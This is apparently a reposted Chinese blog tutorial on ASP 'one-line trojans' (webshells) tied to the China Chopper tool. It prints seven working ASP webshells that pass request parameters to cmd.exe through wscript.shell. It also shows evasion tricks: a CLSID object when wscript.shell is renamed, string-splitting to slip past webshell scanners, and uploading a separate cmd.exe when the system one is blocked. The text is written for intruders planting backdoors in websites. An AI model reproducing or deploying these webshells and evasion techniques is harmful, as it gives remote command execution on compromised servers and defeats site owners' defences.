您的位置:首页 > 编程语言 > ASP

关于asp、php,jps一句话木马--中国菜刀使用

2014-12-15 00:19 375 查看
工具下载地址:http://pan.baidu.com/s/1o6jxAgq这里的asp后门不指像那些一句话木马、砍客、冰狐、明小子之类的b/s型的,只指像cmd.asp或2005a.asp的。

第一个,来看zzzeva免fso的cmd.asp

代码如下:<form method="post">

<input type=text name="cmd" size=60>

<input type=submit value="run"></form>

<textarea readonly cols=80 rows=20>

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c

"&request.form("cmd")).stdout.readall%>

</textarea>

是不是觉得有点长了?在黑客注入时写有点不好写。那来改一下。

第二个,更改zzzeva免fso的cmd.asp

代码如下:
<textarea readonly cols=80 rows=20>

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c

"&request("cmd")).stdout.readall%>
用法是xx.asp?cmd=net user

这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个

第三个,缩短的cmd.asp
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c

"&request("cmd")).stdout.readall%>

这里用了response.write,变量用了cmd。为什么不更短呢?

第四个,更短的cmd.asp
<%=server.createobject("wscript.shell").exec("cmd.exe /c

"&request("c")).stdout.readall%>
好像这就是最短的了。除了短,我们还要在别的地方下功夫。

第五个,wscript.shell被改名怎么办?

代码:
<ObjEct runat=sErvEr iD=kk scOpE=pagE

classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>

<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
当然,classid值在不同系统下有所不同。这个要自行更改
第六个,被一些杀asp木马的软件检测出来怎么办?

把变量拆开呀。代码:

<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c

"&request("c")).stdout.readall%>

<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c

"&request("c")).stdout.readall%>
这里代码引号里的东东都可以随便拆的,像还可以拆成

<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c

"&request("c")).stdout.readall%>

第7个,cmd.exe不让调用怎么办?

这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:
<%=server.createobject("wscript.shell").exec("e:\aspx\cmD.EXE /c

"&request("c")).stdout.readall%>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息